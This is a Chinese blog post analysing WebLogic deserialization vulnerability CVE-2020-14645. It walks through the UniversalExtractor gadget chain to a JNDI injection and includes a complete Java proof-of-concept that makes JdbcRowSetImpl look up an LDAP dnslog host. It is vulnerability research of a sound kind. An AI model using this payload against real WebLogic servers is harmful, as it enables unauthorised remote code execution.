WebLogic CVE-2020-14645分析

最新推荐文章于 2022-07-20 17:08:16 发布
最新推荐文章于 2022-07-20 17:08:16 发布
阅读量620 收藏 1
点赞数
分类专栏: 代码审计 java安全 文章标签: 网络安全 java 安全漏洞 中间件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53264525/article/details/121863563
版权

WebLogic CVE-2020-14645分析

在经过 CVE-2020-2555CVE-2020-2883 之后,WebLogic 把 MvelExtractor 和 ReflectionExtractor 列入反序列化黑名单,那么还怎么利用呢?这就有了 CVE-2020-14645

CVE-2020-14645 利用的是 WebLogic 12.2.1.4.0 Coherence 组件特有的 com.tangosol.util.extractor.UniversalExtractor 类,只有这个版本能用,因此比较局限

漏洞分析

调用链如下:

* PriorityQueue#readObject 
  * ExtractorComparator#compare
    * UniversalExtractor#extract 
     * UniversalExtractor#extractComplex 
       * JdbcRowSetImpl#getDatabaseMetaData
         * JdbcRowSetImpl#connect

先看到 ExtractorComparator 类,这个类实现了 Comparator 接口,因此可以用作 PriorityQueue 的比较器,看到 compare 方法,其调用了 this.m_extractor.extract 方法,m_extractor 属性和方法的参数 o1 都可控!
image-20211210185210992
这里我们选择调用的是 UniversalExtractor#extract 方法,这个方法可以调用到 extractComplex 方法
image-20211210185330393
CVE-2020-2555 一样,这个方法通过 findMethod 反射获取一个指定参数的 oTarget 类的方法
image-20211210185625707
通过 getCanonicalName 方法获取 sCName 变量值,这里跟进一下 getCanonicalName 方法
image-20211210185725095
跟进一下 getValueExtractorCanonicalName 方法,可以知道 if 条件肯定不满足,返回值为 null
image-20211210185805357
那么就调用 CanonicalNames#computeValueExtractorCanonicalName 方法,方法参数值可控!
image-20211210190008198
根据上面的代码,我们需要让 sName 参数以 () 结尾,参数 aoParam 长度为 0,假如 sName 为 getDatabaseMetaData(),则返回值为 databaseMetaData,如下例子就返回 databaseMetaData
image-20211210191524039
回到 UniversalExtractor#extractComplex 方法获取到的就是 JdbcRowSetImpl#getDatabaseMetaData 方法
image-20211210191915579
总结起来就是可以调用到任何类的任何 getXXX/isXXX 方法,这里调用 JdbcRowSetImpl#getDatabaseMetaData 方法
image-20211210192123815
跟进 connect 方法,这里存在一个 JNDI 注入,DataSourceName 值可控!
image-20211210192222394

POC

package com.supeream;

import com.sun.rowset.JdbcRowSetImpl;
import com.tangosol.util.comparator.ExtractorComparator;
import com.tangosol.util.extractor.UniversalExtractor;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.PriorityQueue;

public class POC03 {
    public static void main(String[] args) throws Exception{
        ExtractorComparator extractorComparator = new ExtractorComparator();
        JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl();
        PriorityQueue priorityQueue = new PriorityQueue(2,extractorComparator);
        UniversalExtractor universalExtractor = new UniversalExtractor("getDatabaseMetaData()",new Object[0],1);
        Field m_extractor = extractorComparator.getClass().getDeclaredField("m_extractor");
        m_extractor.setAccessible(true);
        m_extractor.set(extractorComparator,universalExtractor);
        jdbcRowSet.setDataSourceName("ldap://dmosws.dnslog.cn");
        priorityQueue.add(1);
        priorityQueue.add(jdbcRowSet);
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
        objectOutputStream.writeObject(priorityQueue);
        objectOutputStream.flush();
        objectOutputStream.close();
        ObjectInputStream objectInputStream = new ObjectInputStream(new ByteArrayInputStream(byteArrayOutputStream.toByteArray()));
        objectInputStream.readObject();
    }
}

总结

因为只能在 WebLogic 12.2.1.4.0 版本使用比较局限,但是从学习的角度来说还是要学习的!

Reference:

https://www.cnblogs.com/zpchcbd/p/15630412.html

0x6b79
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2020-14882 WebLogic远程代码执行漏洞复现
千寻的博客
12-17 1万+
Weblogic简介 WebLogic Server是美国Oracle公司的主要产品之一,其主要用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用,是商业市场上主要的Java(J2EE)应用服务器软件之一。 漏洞描述 2020年10月28日,Oracle发布的10月安全更新中的Oracle WebLogic Server 远程代码执行漏洞(CVE-2020-14882)POC被公开,远程攻击者可以通过发送恶意的HTTP GET 请求。成功利用此漏洞的攻击者可在未经身份验证的情况下控制 We
WebLogic UniversalExtractor反序列化漏洞(CVE-2020-14645)的复现和分析
smellycat000的专栏
11-23 530
聚焦源代码安全,网罗国内外最新资讯!1.1 状态完成漏洞挖掘条件分析、漏洞复现。1.2 简介WebLogic 是美国 Oracle 公司的 Java 应用服务器,确切说是一个中间件,被...
python注解_python注解_python 注解_python注解方法 - 云+社区 - 腾讯云
weixin_39827304的博客
11-29 944
广告关闭腾讯云11.11云上盛惠 ,精选热门产品助力上云,云服务器首年88元起,买的越多返的越多,最高返5000元!函数注解function annotations函数注解 python 3.5引入对函数的参数进行类型注解 对函数的返回值进行类型注解只对函数参数做一个辅助的说明,并不对函数参数进行类型检查 提供给第三方工具,做代码分析,发现隐藏bug 函数注解的信息,保存在__annotation...
weblogic t3协议配置_腾讯蓝军安全通告:WebLogic远程代码执行漏洞(CVE-2020-14645)
weixin_39575737的博客
12-06 761
漏洞概述:今日,Oracle官方发布WebLogic安全更新,其中修复了一个CVSS评分为9.8的严重漏洞(CVE-2020-14645),该漏洞通过T3协议和IIOP协议进行利用,攻击者可以实现远程代码执行,进而控制服务器。由于漏洞利用复杂度低,风险高,建议尽快修复。发现过程:腾讯蓝军(Tencent Force)在测试WebLogic历史漏洞时发现补丁修复不全面,Oracle Coherenc...
weblogic漏洞利用工具_CVE202014645 Weblogic远程代码执行漏洞分析
weixin_39797758的博客
12-12 2186
一. 说明本文将针对Weblogic CVE-2020-14645漏洞进行分析和复现,仅从技术角度进行研究与讨论,严禁用于非法用途,违者后果自负。PS:本攻略由群友飞翔的delacroix(305536130)及Z(997362569)供稿,本人审稿。二、漏洞描述WebLogic是美国Oracle公司出品的一个application server,是一个基于JAVAEE架构的中间件,We...
Weblogic漏洞分析之JNDI注入-CVE-2020-14645
洋洋的小黑屋
09-15 48
Weblogic漏洞分析之JNDI注入-CVE-2020-14645 Oracle七月发布的安全更新中,包含了一个Weblogic的反序列化RCE漏洞,编号CVE-2020-14645,CVS评分9.8。 该漏洞是针对于CVE-2020-2883的补丁绕过,CVE-2020-2883补丁将MvelExtractor和ReflectionExtractor列入黑名单,因此需要另外寻找一个存在ext...
CVE-2020-14645漏洞本地复现
weixin_42075643的博客
03-08 1542
CVE-2020-14645是一个weblogic远程代码执行漏洞。 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 WebLogic是美商Oracle的主要产品之一,是并购BEA得来。是商业市场上主要的Ja
Weblogic12c T3 协议安全漏洞分析CVE-2020-14645 && CVE-2020-2883 && CVE-2020-14645
weixin_45694388的博客
10-02 1933
前言 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件。 主要用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 近几年频繁爆发出多个RCE漏洞,而在今年,其T3协议被频繁攻击和发布补丁与绕过,本文主要对今年来由T3协议入口所产生的多个RCE漏洞进行分析,其中主要包括CVE-2020-2555、 CVE-2020-2883(bypass CVE-2020-2555补丁)、 CVE-2020
Weblogic远程代码执行(CVE-2020-14645
黑白的博客
12-05 1533
声明 好好学习,天天向上 漏洞描述 Weblogic是美国Oracle公司出品的一个Application Server,确切的说是一个基于JavaEE架构的中间件Weblogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 攻击者可利用该漏洞实现远程代码执行。该反序列化的gadget存在与coherence包中。编号CVE-2020-14645。 反序列化的对象,通过t3发送给weblogic即可。所以,这个只是生成payload的工具。 影响范围 Ora
WeblogicCVE-2020-14882,CVE-2020-14883) 管理控制台未授权远程命令执行漏洞
god_Zeo的安全博客
11-02 5965
WeblogicCVE-2020-14882,CVE-2020-14883) 管理控制台未授权远程命令执行漏洞 0x01 漏洞简述 2020年10月29日,360CERT监测发现 Weblogic ConSole HTTP 协议代码执行漏洞,该漏洞编号为 CVE-2020-14882,CVE-2020-14883 ,漏洞等级:严重,漏洞评分:9.8。 远程攻击者可以构造特殊的HTTP请求,在未经身份验证的情况下接管 WebLogic Server Console,并在 WebLogic Server Co
CVE-2020-14645:Weblogic CVE-2020-14645 UniversalExtractor JNDI注入getDatabaseMetaData()
03-08
CVE-2020-14645 Weblogic CVE-2020-14645 UniversalExtractor JNDI注入getDatabaseMetaData() 项目取决于 演示版 要求 JDK版本<JDK6u211 / 7u201 / 8u191 Weblogic版本12.2.1.4.0 不要非法使用!!!!! 参考 谢谢 @MitAh
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
WebLogic CVE-2019-2725补丁.zip
07-16
weblogic反序列化补丁包
CVE_2020_2546:CVE-2020-2546,CVE-2020-2915 CVE-2020-2801 CVE-2020-2798 CVE-2020-2883 CVE-2020-2884 CVE-2020-2950 WebLogic T3有效负载利用poc python3,
03-20
推特: 1,Weblogic RCE漏洞利用CVE_2020_2546 CVE-2020-2915 CVE-2020-2801 CVE-2020-2798 CVE-2020-2883 CVE-2020-2884 CVE-2020-2950 WebLogic RCE T3有效载荷利用POC python3 2,利用GIOP +发送绑定(CVE-2020-...
Weblogic-CVE-2019-2725补丁升级方法.docx
11-08
-----------------------------...有关于CVE-2019-2725漏洞信息涉及版本, 代码执行危害请百度查询 Cve-2019-2725 升级安装开始 1,cache_dir 这个目录 需要 自己建立 mkdir /Oracle/Middleware/utils/bsu/cache_dir
Weblogic12.2.1.4 安装步骤,补丁安装
yuezimo的博客
07-20 2951
简单,详细,傻瓜式部署weblogic和补丁更新
Weblogic远程代码执行漏洞(CVE-2020-14645)复现
锋刃科技的博客
07-25 4572
前言 WebLogic是美国Oracle公司出品的一个application server,是一个基于JAVAEE架构的中间件WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。Oracle WebLogic Server存在远程代码执行漏洞。攻击者可利用漏洞实现远程代码执行。 环境搭建 下载地址: https://www.oracle.com/middleware/technologies/weblogic-server-insta.
Weblogic远程代码执行漏洞(CVE-2020-14645)
suiyideAli的博客
10-13 1324
简介 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 攻击者可利用漏洞实现远程代码执行。 影响版本 Oracle WebLogic Server 10.3.6.0.0 Oracle WebLog.
weblogic-cve-2020-25516
最新发布
07-25
C知道: 对于您提到的Weblogic漏洞CVE-2020-25516,这是一个已经被公开披露的漏洞,它影响了Oracle WebLogic Server的某些版本。 具体来说,这个漏洞是由于WebLogic Server管理控制台的不当权限验证机制所导致的。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值